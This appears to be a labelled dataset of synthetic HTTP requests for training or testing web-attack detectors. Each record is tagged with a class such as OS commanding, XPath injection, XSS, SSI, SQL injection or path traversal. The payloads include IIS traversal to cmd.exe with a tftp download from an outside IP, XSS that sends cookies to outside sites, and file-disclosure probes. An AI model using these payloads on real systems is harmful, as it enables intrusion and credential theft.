GET /mnc0dTs8ytsr.jpg?cvbscriptr4homemTK=8110531&6msahqueYsseixs=3eqAnH&djzQdtr=ysrieQr4iframesE&vhlnuTu@.T=tihiA9Eur16tacos&db32g4osl=a&ie5=ormb+tt%25estylecy%40en&eamiNkTNsxlruaA=r4nrntq2in&epfnb8qx9=6++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+340%3D&ltu=nHgsJbmk6Xm&snHodikijk=3876582800&tjTYaU3Ie=eqIzSunB&aiynzeon=hass%29emvaccepts HTTP/1.0
Host: 60.132.0.133:116
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-8-i;q=0.6, iso-8859-8-i, euc-cn;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=4
Client-ip: 251.247.9.85
Cookie: e5eoeZla=atzReAoEmQXD
Cookie2: $Version="7"
Date: Thu, 27 Nov 08 17:25:21 CET
ETag: W/"s3klw_r.kke6tQh"
Expect: iaeoct=i0eao6Xh;aoccEe=barnyz
From: tmHtei@9Eaetn4.de
If-Modified-Since: Mon, 04 Jan 10 03:07:35 GMT
If-Unmodified-Since: Sun, 28 Nov 04 24:51:01 UTC
If-Match: *
If-None-Match: "M2o.KHXAyB@bXeNbgnSV"
If-Range: Thu, 14 Dec 06 11:13:43 GMT
Max-Forwards: 30
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest response="3EBCB3A2aaB0a8C77f9b20Ae891C650D"
Authorization: NTLM YWxoNWlhaGl0YXFtbGVtcWUybU5vdGUyYWVzYW5kdGhjbG8=
Range: -5492,963-312971
Referer: /nmheY/eykzn/HE1yaiF/sqie.jsp
TE: trailers
Trailer: Expect
User-Agent: Mozilla/2.3 (compatible; MSIE 4.0; Unix; aladaze; xusrdhotdr)
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6094x1402
Via: b7oere/7.9 129.234.83.240, HTTP/0.6 www.ozexwa.png:43, 7.9 www.iefih.jpeg
Transfer-Encoding: Mhni
Upgrade: ierniu/6.4, ytteh/9.3, ahoito/8.8
Warning: 538 76.5.143.201 "toetlotsdoestrvfje" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 13247958
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49704
Start - Id: 42899
class: OsCommanding
GET /tihcwoe/uuFwZ72N-L2/e@/Aeeghlterteuhscl/ftpOsock_streamfYsls6Wwc_T4/csQMFv@BOtqxo5w.mspx?wle=sgyhe8s&alo4s9ri6s=%7C+++++dir++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C%2C&rIeocgrUndTr=529&6cxpnt=imnwum&afEn=ofE&aclofeqaedmbti2=69539388&tnkebtrmaEheoau=2642&tclsxgws=selectea%28sam&sf2iuu=a&aewnlo3ux=eid&QzuaaeAHnicirn=nep HTTP/1.0
Host: 15.85.95.235
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic
Accept-Encoding: gzip;q=0.4, compress;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 220.16.210.0
Cookie: oR=a y3r)aoooerwj$t1v
Cookie2: $Version="71"
Date: Wed, 21 Jul 04 07:33:04 CET
ETag: W/"AgkTXED.n5oFVon"
Expect: torrt
From: Osrmorba@tAdnt9t.st
If-Unmodified-Since: Fri, 20 Jun 08 02:11:24 GMT
If-Match: "zoqCVLwx.m@sLsjAA"
If-None-Match: *
Max-Forwards: 396
Pragma: Eern='dnofi'
Proxy-Authorization: tnjdb exudt=knpuX
Authorization: Basic aWtyZDpxZUpOemF0
Referer: http://www.dtfd.be/th6k/raswoy.mpeg
TE: trailers,trailers,trailers
User-Agent: ardageldwu (mTyYaGwv5a; oZhBpq_; eQnm6q9p)
UA-Disp: 2272,6803,16
UA-Color: color32
Via: 7.3 www.wdgAsi.js, 9.5 32.49.91.171
Transfer-Encoding: identity
X-Forwarded-For: 191.162.116.219
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42899
Start - Id: 44046
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.1
Host: 172.93.197.49
Connection: keep-alive
Accept: image/*, text/html, audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 7iolii-3e2rs;q=0.0, t-twrjg9, 3tE-7, srEca-tNEeo
Cache-Control: no-transform
Client-ip: 11.19.174.55
Cookie: boot.inizF1ny@G=8925035155;oct=de1LvgormtIta;gs=olE;jI96BeRqXrOb=oaoasu;ndnnsta=Ac;jlle4oaemwu6=ei6DA1uLz
Cookie2: $Version="20"
Date: Thu, 12 Oct 06 17:55:00 GMT
ETag: W/"Li@1xMYgprnknCP5zgmr"
Expect: 100-continue
From: 6aep@Eebnu.org
If-Modified-Since: Sat, 30 May 09 20:22:03 CET
If-Unmodified-Since: Mon, 23 Jul 07 12:04:54 GMT
If-Match: *
If-None-Match: "cvZ-j7azdGPgm9I4"
If-Range: *
Max-Forwards: 1125
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: 3kfrae lae59lhs=Se9l
Authorization: Basic ZW5hc2k6anJuYW9ueWE=
Range: 67-764741,470518-20,3-202913
Referer: /escrn/UIpsoor/soy5koE8/qiatnhd/mrlyu.asp
TE: trailers,chunked
Trailer: Authorization
User-Agent: tlaTOghcenmyt7000eD
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 695x429
Via: deaoxc/4.0 29.20.165.153:913
Transfer-Encoding: gzip
Upgrade: Eaxve/8.7, yk0s/2.8
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 44046
Start - Id: 44508
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 210.170.216.176:06
Connection: close
Accept: text/plain;q=0.8, application/zip;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: bUxu-rxosrw;q=0.7
Cache-Control: no-transform
Client-ip: 200.92.139.197
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="123"
Date: Wed, 31 Mar 10 07:12:50 UTC
ETag: W/"HcdXasxzouezv38hXg"
Expect: auaEbj2f=ti3z24oz
From: ciaeri@estekqcd.uk
If-Modified-Since: Mon, 04 May 09 20:29:35 UTC
If-Unmodified-Since: Sun, 11 Jan 04 21:19:15 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5157
MIME-Version: 8.2
Pragma: 6S79ho=egaepie
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 02051-7,-37253,903-654
Referer: http://Tcur4itP.biz/aUtktiaI/thkaeida/enr3/r9eceN/oetosbEo.txt
TE: gzip;q=0.6
Trailer: Via
User-Agent: Mozilla/8.7 (Windows; U; Win98 7.1; ko-Ee; rv:1.6.4) Gecko/05049157
UA-CPU: Sparc
UA-Disp: 715,347,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 455x841
Via: HTTP/8.2 189.183.226.152, HTTP/8.6 70.24.243.218, HTTP/9.7 www.edntn.gif
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44508
Start - Id: 35640
class: XPathInjection
GET /frWZDjffjX/F_a7/siOpk4lnx466eaelo/erdgcouAaef/UyZrwt7nkos3ts16Cg/nuAopbRhweyn/a8G/onhtsrsNdLyefnIifia/er/e@1CRwHPQHOt.shtml?XAl1=5310206&Bwslw=erl&xiechudIdae=qefxhp%27+++or+6+%3C++count%28path%2Fchild%3A%3A*%29+or+%27rt7%27++%3D++++%27&iileuhaeaet9S=790&reutEuo=etopen0at%40%24o HTTP/1.0
Host: www.l8irtrre7o.gov
Connection: dlsUteht
Accept: video/mpeg;q=0.8
Accept-Charset: *
Accept-Encoding: identity;q=0.1, gzip, identity;q=0.1
Accept-Language: s-dc, 1ur4aU-t
Cache-Control: bmrdbrp=miike
Client-ip: 69.177.219.175
Cookie: ybetweenf_Nsps=anpdtiLsaee;5rcnrsslioa=3185;a3eeavetlee=stnki
Cookie2: $Version="5"
Date: Sat, 06 Mar 04 23:10:45 GMT
ETag: W/"5joi@sl1CHdkS19bN3"
Expect: 100-continue
From: esirPUo@ltaa.cz
If-Modified-Since: Mon, 12 Sep 05 21:13:01 CET
If-Unmodified-Since: Wed, 24 Dec 08 02:45:14 CET
If-Match: "@mJE_Mt4cyjZjSq"
If-None-Match: "eqCypgzeag9x73Ip"
If-Range: "ZGfN_o8g6C7qkTyFq_r"
Max-Forwards: 12
MIME-Version: 1.3
Pragma: h='onEeEth'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: NTLM RG9kY0lPanM3aGlpd1M2dGFvZ2kxaDRrbm0wdGVyY3Noc3Bobm56YmQ=
Range: -38,162-85,-031
Referer: /diwrnn/ieferi7n/vdiSkAh7.cgi
TE: gzip,gzip,gzip;q=0.3
Trailer: Range
User-Agent: ttet9entunieoey
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3327x2128
Via: tete3/5.1 81.40.254.3, 3.0 217.130.122.170:6687
Transfer-Encoding: identity
Upgrade: e1e/4.3, eSaj/4.1, rweui/7.2
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35640
Start - Id: 48899
class: XPathInjection
GET /tfuAeibasoaSaseM/TaHaett/ie/lPmechosFx/yxwbN7joj8ZI/nSWbRVU/ueVuH-nVKNUPtrGcFr/z7sV-mmK-Vf.sh?ust8sat=winntm&@passthrul@NwtMDoA=a%2FhgaBiuas&to=Gywgetci&0swEnBWssy=s2unallnrbnknqfe&en1=ruhDanhI%27+++or++1%3C++e%2Frrlh1%2FIf%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D904%5D+++or+++%277m2lz%27++++%3D+%27&abf=06300428&xrhrq5oh=t+niteofit9yte&locenee=2g2hTkXpBNd&nobsgxsanoe=O3acceptsler&Nehogwni=+v&Suerrirhme=hhE%7Cehfewget%3BtIn HTTP/1.1
Host: www.flejl.uk
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: kp1i5ha-eaavhhz, nto28l-eeeh
Cache-Control: min-fresh=073
Client-ip: 153.160.118.93
Cookie: FER8m=eua;FT2Ek6fnIC=sock_streama:Llr;4ntng=u0eopenf;pl=eiNeos2;mmsaen=42778;p1bodyy0I=87
Cookie2: $Version="0"
Date: Fri, 08 Jul 05 19:35:57 CET
ETag: "_HQ8LHNG-3oa4B2l"
Expect: doeh2s
From: ge7m@nttgt.gov
If-Modified-Since: Sun, 08 Nov 09 08:18:21 CET
If-Unmodified-Since: Mon, 18 Jan 10 04:36:33 UTC
If-Match: "bE3HV.B4dO84C3qwh"
If-None-Match: "ZyzK5c.Tj9h7vVT"
If-Range: "cpyrrq6ZO6pNfNk8Iz"
Max-Forwards: 348
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM bWFzZmV0ZWV0N3FlZWl3c2Fsa3NucmNodnNUeVJpcnJldEU5MXU=
Authorization: Basic ZTZhZTo1dXRvZHBh
Range: 87-22
Referer: /2hqe/iitteems/gjnnrlgd/faude.gif
TE: gzip;q=0.7
Trailer: Warning
User-Agent: Mozilla/4.2 (compatible; MSIE 9.2; Windows NT; dEmirsatO)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 978x515
Via: 6.5 www.rsvjbss.tiff, FTP/4.5 www.tgebnt5.png, 1.0 www.Rtasne.jpg
Transfer-Encoding: compress
Upgrade: o6r/8.3, gsh/9.3, o8o/3.8, 2oIojh/2.5
Warning: 712 39.177.49.129 "e9wsavnreymOd" "Wed, 28 Jun 06 09:25:28 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 045358782240634
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48899
Start - Id: 48241
class: XSS
PUT /vheredfhowrrcve/tc/i5e7EtanPeepRreaotO/4eel1r4caecl.shtml? HTTP/1.1
Content-Length: 267
Content-Language: oouu,g
Content-Encoding: gzip
Content-Location: http://www.wcdie.it/SXtiT.png
Content-MD5: b3NvcjVuaGp4TmlEZXJvbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Aug 06 05:19:29 UTC
Last-Modified: Thu, 01 Jul 04 17:58:53 CET
Host: 214.109.86.56
Connection: close
Accept: image/*, text/plain, application/postscript
Accept-Charset: x-mac-roman;q=0.2, iso-8859-6, us-ascii;q=0.4, iso-8859-6
Accept-Encoding: 
Accept-Language: rvlcIxq-aIja;q=0.0, b-n, Wtreoyh-te, COnz-mpl;q=0.1, katote-egih;q=0.9
Cache-Control: no-transform
Client-ip: 64.5.122.208
Cookie: mLMe=40505;3iy2HngFz4rno=eleecho;Iqhsapatxai=<img src  = " chil  > "     onmouseover= "   [document.location.replace  ('http://www.elro.com/cgi-bin/ilisesli.cgi'+document.cookie);]     "  >;wioi6cawZl8=9apgto
Cookie2: $Version="46"
Date: Wed, 15 Sep 04 19:41:24 CET
ETag: W/"a5F@0drUtN9uI7JDS"
Expect: 100-continue
From: 4abpeimw@swTeELs5wa.de
If-Modified-Since: Fri, 02 Mar 07 18:53:43 UTC
If-Unmodified-Since: Sat, 20 Jan 07 08:26:24 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 21 Feb 07 06:26:08 UTC
Max-Forwards: 069
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWkxdGFUemhFZ29lb3ZqODlnc2k3V2NCc3dhc1hzQ2x0Y0hpdFl1cg==
Authorization: Digest opaque="ceTau"
Range: -2
Referer: /efakaen.swf
TE: chunked,trailers
Trailer: Warning
User-Agent: Mozilla/6.1 (compatible; Konqueror/5.8; Mac OS X; acitnolnrm; murp)
UA-CPU: Sparc
UA-Disp: 0382,578,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 530x220
Via: ac5Hns/2.0 195.126.200.89
Transfer-Encoding: Xfige; ndCxnnt=7oetsj
Upgrade: Sey0ci/4.4, t8koji/2.5, aosy/4.1
Warning: 589 www.wmudmSt.gif "A1tnuSrpoadltco" "Wed, 11 May 05 20:52:28 CET"
X-Serial-Number: 793433345048
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1GbzLNmoqW3W=rZUF9Dx@&sfo84khs=65&8GRw6oY=e7hUOg1haHee&RSG3=2 Haoa[l6%c&ak=seval5window.openelwi&v7g5a=8  i&eewiueeh=yct@&hhohngo1=22210&trthinazedoe=enrtaaua&7giNlnyb6rNoa=s&relilVe=aitesqm&ede=1hEm&NSQd=03586&gxcimldHctat53u=(om>si:+script1$99cwsr

End - Id: 48241
Start - Id: 40576
class: SSI
GET /t1/hLnT0poRHswiLAnPVl/wZwvq6j/sXJ1OzQyABl/yF/nQaxNUzoyu/liwnicitcNea/tese9Tgndenlzbrnsnos/nsinmemyOeoetpat/cBn.css?aHe=+%25uEf&he8oma6aoet=lfFna4&oaj=div+scriptosock_streams&srlWae=oeNbmevetheynorN&or-DA7_bfC0cA=wieepna&iBOatccNJrAtA=%3C%21--+++++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&dongf=011270&moi2t9iaLhxTrn=nwHbanchild8ees4h95&asnyL1s=eoe&Etlmmeeto0eue=%3CrNxe&pu=S2dsnCjju&FSdcUc8null=w%3Eo&aZtbskT=o2bkr7iem HTTP/1.0
Host: 128.100.133.146
Connection: ihlhtbe
Accept: */*
Accept-Charset: windows-1251;q=0.8, iso-10646-ucs-2;q=0.3, windows-1253;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 235.213.156.191
Cookie: daAsdosh=o8QE97;smarrtzscc4rH=118570;chaoat5Xmqsd=2885145
Cookie2: $Version="656"
Date: Sat, 10 Oct 09 10:41:34 UTC
ETag: "8D.wztjHo2Ak06X"
Expect: rentuei=eesik4r;tyjZRs
From: ciHn@mdreeh.gov
If-Modified-Since: Sat, 12 Dec 09 05:59:24 GMT
If-Unmodified-Since: Sun, 19 Dec 04 12:28:39 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 11
MIME-Version: 9.1
Pragma: tE=ter
Proxy-Authorization: Basic ZW5zeW80OmV0ZWF5
Authorization: Basic Zm9vZGVhYTpzY29v
Range: -296381
Referer: http://www.ttuo.be/o3eognot/Arsyl1t.avi
TE: trailers
Trailer: Date
User-Agent: tfQNZHHd http://www.hdc3ent.uk
UA-CPU: PowerPC
UA-Disp: 563,477,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: FTP/6.4 193.1.211.237:356
Transfer-Encoding: compress
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 218.205.84.216
X-Serial-Number: 69115
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40576
Start - Id: 44288
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 172.241.207.70
Connection: keep-alive
Accept: text/plain, application/x-tar
Accept-Charset: iso-8859-6;q=0.4, macintosh, x-mac-greek
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=44540
Client-ip: 136.184.250.5
Cookie: psc=tm;lunionWkAVku7.=668483
Cookie2: $Version="0"
Date: Thu, 20 Sep 07 14:15:41 GMT
ETag: "b_1HVy3bbCtIipID7"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Thu, 21 Dec 06 03:26:43 CET
If-Unmodified-Since: Thu, 16 Sep 04 21:53:31 CET
If-Match: "yVetv82c4EOuubLZ"
If-None-Match: "sXzhETLzaX4W4CVxSK1S"
If-Range: Mon, 08 Nov 04 16:50:31 UTC
Max-Forwards: 999
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM b1dmc2ZsdHh6cmV0d2F0dDlsYmlkYWhpc2lrcW5kYWFlOHJ1Zw==
Authorization: bblvie jhhoe1=hl8E8o
Range: 77-00,194-
Referer: /8ceNeoi3/grbbig/lmgs.swf
TE: chunked,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.6 (compatible; MSIE 5.1; Windows NT; tsTue; prep)
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0573x2598
Via: FTP/3.8 www.4iden.png:946, 4.5 www.mie3.tiff, jlawrd/1.2 www.a0eefe.css:9260
Transfer-Encoding: Oserkm; tohe=lu8n
Upgrade: Taelt2/9.4, g2upn/4.9, ot6/5.3
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 76527711
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44288
Start - Id: 41739
class: SqlInjection
GET /h-xgCZP4fE/V0iuceeiap/kpDNxervx.JLFvA@4r7/eLStuuKdo1/wacceptJBBahCm_8Us/n27NxN608wfo@.cgi?ttfciIIadjl=betweenUeJeans2c%5DN%3Dt&hazNhprw6rtmtn=8463069236&4e=svd&2wget@_8=uc%27d%5Dobject&Naoe6roHeen=OrigText%27OR%27bwnar%27+++%3D++%27aa%27&rihmimohlceyt=isms&EqonzuTrsft=i&dew=oosUwuE%28%7E%5D%24to&tfO2uxenm8w=tddas&mnnpr=aj2&1tss7nnle7rN=542&rahndaayt=%28gC&rLts8n=r%3Cl8mSE2&lmn4linugu=Ehes1eiIoeeeoueore&tg4dsetodax=oy%2Bo%40+w1ieftpi0eihescripte HTTP/1.0
Host: 77.178.85.135:80
Connection: wfjd7h
Accept: audio/basic;q=0.1, application/zip;q=0.4, image/*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: Otpei0-aonIa0a;q=0.4, i-tO, rtar-inThl;q=0.1, d2kci0of-rt, i-ndragr;q=0.7
Cache-Control: eOtiAcd=7A
Client-ip: 136.31.14.94
Cookie: yanthse34dK7wi0=an4igm~2athttcuopt%u];0aEtihdepyf=j;getnAnhoeid1a=tYIf;HkRusrdNmBEF=mrtkHtha1nupan;wiaPeemOtrt=EtLft>;Eat8ilaenis=0426
Cookie2: $Version="5"
Date: Mon, 08 Sep 08 02:07:00 GMT
ETag: "3RzLyYlW.gVQq0ScRi"
Expect: 100-continue
From: jMelerog@d2JLz3sO.it
If-Modified-Since: Thu, 22 Oct 09 21:44:27 CET
If-Unmodified-Since: Thu, 15 Feb 07 05:30:17 UTC
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: *
If-Range: Thu, 21 Jul 05 08:40:36 UTC
Max-Forwards: 5
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic bGRsbTpjaWFl
Range: -9158,6593-962,-115779
Referer: http://www.Hsegts.de/ronng/itant/rmnsh/ynddwa.cgi
TE: chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: ohnebhmn/8.2
UA-CPU: 68000
UA-Disp: 965,4025,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8130x9539
Via: HTTP/5.6 242.161.59.19, fee/0.9 www.c6inftl.gif, FTP/4.5 200.72.175.157
Transfer-Encoding: identity
Upgrade: OcN/3.5, 0iet/4.6, opaid/9.4, RiWniu/3.2, egwh/3.6
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41739
Start - Id: 49783
class: XPathInjection
GET /smbsZ3LgZL2Z27Z/e8q/eO/58v8/ro312vKL/Wog/7Z9.Jvn_O2Tc.dll?q9ikt=iHatowogn%3C+&ktRcmtlUost=rwAW3UutF2k2&ytefjsooinx0eiO=cgcdesdsN&auooghQtrk=iV&mutwi4t=tss5sedn%27+or+%28i++++%3C+count%28R9wIi%2Fchild%3A%3Atext%28%29%29+++and++++j++%3C++count%28erq%2Fchild%3A%3Acomment%28%29%29++++and++k+++%3C+++++count%28ri7an%2Fchild%3A%3A*%29+%29+++or+++++%27revreMd%27+%3D++++%27++++scO2e%27++++or&iat5=t0die&karhoo1frxae95=varnl%2Foue&5rrae=e&resoea9eoaan=neieeamaada9orcopy&UPPpyoJ=%3Amn3replacei%5Diu&hnc=20567&TZqSA_w=5499769&cF1V=oaqCHwrU&ioiu=cNwm HTTP/1.1
Host: www.oror.com
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: koi8-r;q=0.9, utf-7;q=0.4, gb2312;q=0.6, iso-8859-9;q=0.5, iso-8859-6;q=0.4
Accept-Encoding: deflate;q=0.3, identity;q=0.6, compress;q=0.0, gzip;q=0.2, compress;q=0.8
Accept-Language: lrhcdt-15j;q=0.2
Cache-Control: max-age=452
Client-ip: 227.62.139.89
Cookie: yoaaitrkrR=5
Cookie2: $Version="658"
Date: Sun, 07 Dec 08 06:59:11 UTC
ETag: "JQl-q5Ler@UUd1wq"
Expect: hekfnM
From: 0o1be@Sjeha.org
If-Modified-Since: Sun, 14 Jan 07 14:05:13 CET
If-Unmodified-Since: Wed, 04 Jul 07 02:52:33 CET
If-Match: *
If-None-Match: "BGEzR4kHxactQoU"
If-Range: Wed, 04 Apr 07 22:13:39 CET
Max-Forwards: 09
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dHNjYTdselZvczdlcmFyYW9pemlldTZhM2hrZUlnbjZ0RXBnc0lkbmNybTY=
Range: 800674-0,376-429,12-
Referer: /syrI/ecetn/ndrSxun/sis0nyti/cunrt.js
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 9.3; 3N-be; rv:2.8.7) Gecko/75868082
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 742x2872
Via: HTTP/0.5 29.73.110.139, 2.6 www.dufhR.js, 9.3 219.39.6.218
Transfer-Encoding: deflate
Upgrade: afn/1.9, wee/7.0
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 5663252755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49783
Start - Id: 47156
class: XSS
GET /uaUedaAnH/715qh/gk2/mhr1tuvLeuuipdtj/oajsjnia/ebCQQ/mQSSd2vEk7/3e/rIla9MjTscEYG_D1@b/6X.css?E7s.kcFsobjectTL=%3Cdiv+style++%3D++++%22background-image%3A++url%28javascript%3A++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.ie.com%2Fcgi-bin%2Ftoolas.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B++%22++++%3E&TpzafoadpKhi=15&didQYE=tCKUDe&dEdstj4aip3EOwr=union&hfgttizdcwle3=sC HTTP/1.1
Host: www.cofdber9fa.biz
Connection: d3st4em
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 181.228.8.193
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="225"
Date: Wed, 23 Dec 09 12:46:20 UTC
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: 100-continue
From: v1syist@Ntei5rra.com
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Thu, 22 Nov 07 16:20:04 GMT
If-Match: *
If-None-Match: "Bk@IKxqGEnEQMGu.e"
If-Range: Mon, 17 Oct 05 16:17:25 UTC
Max-Forwards: 6
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Basic SGF0b2NsOjJmZnoxZVU=
Range: -016,1-,67332-47295
Referer: /Unup/o5wheAy/Htby/h2miate/wEnnrlQ.php
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.3 (compatible; MSIE 2.8; Open BSD i386; 2ienlidy; TZtoNenN6a; slNAa)
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: deflate
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 416 17.78.108.145 "hieN9" 
X-Forwarded-For: 36.159.65.174
X-Serial-Number: 02973768667711464
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47156
Start - Id: 45806
class: PathTransversal
GET /iTc4PMSYh/Ew._gVdF/eridzntcK18YNsaexde.nsf?esmhle8ctico86=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&igsIA0XaEr7adb=2h&jienghs3nsja=+ec%3Di%3Acattautoexecrn2z&PkzkU=l%3Ap+50KL+nas&oRlihyoe=%26a&rai57esDcoleie=74314342&ndctti=ei%3A%27bin HTTP/1.1
Host: www.shtrtys.biz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.0
Accept-Encoding: deflate;q=0.4, gzip;q=0.7
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 241.101.131.168
Cookie: jFrs4.=~4/symcat
Cookie2: $Version="085"
Date: Sun, 19 Feb 06 06:11:22 CET
ETag: "RXzBxEUPj84ka@n1rH"
Expect: 100-continue
From: eswh1@draenetio.it
If-Modified-Since: Mon, 20 Jul 09 12:09:39 GMT
If-Unmodified-Since: Sat, 30 Jan 10 21:02:28 CET
If-Match: "F-9ztL_jB_iUC_D8"
If-None-Match: "la8MYH_M63Ew4HEX"
If-Range: Thu, 13 Mar 08 24:28:32 GMT
Max-Forwards: 69
MIME-Version: 2.9
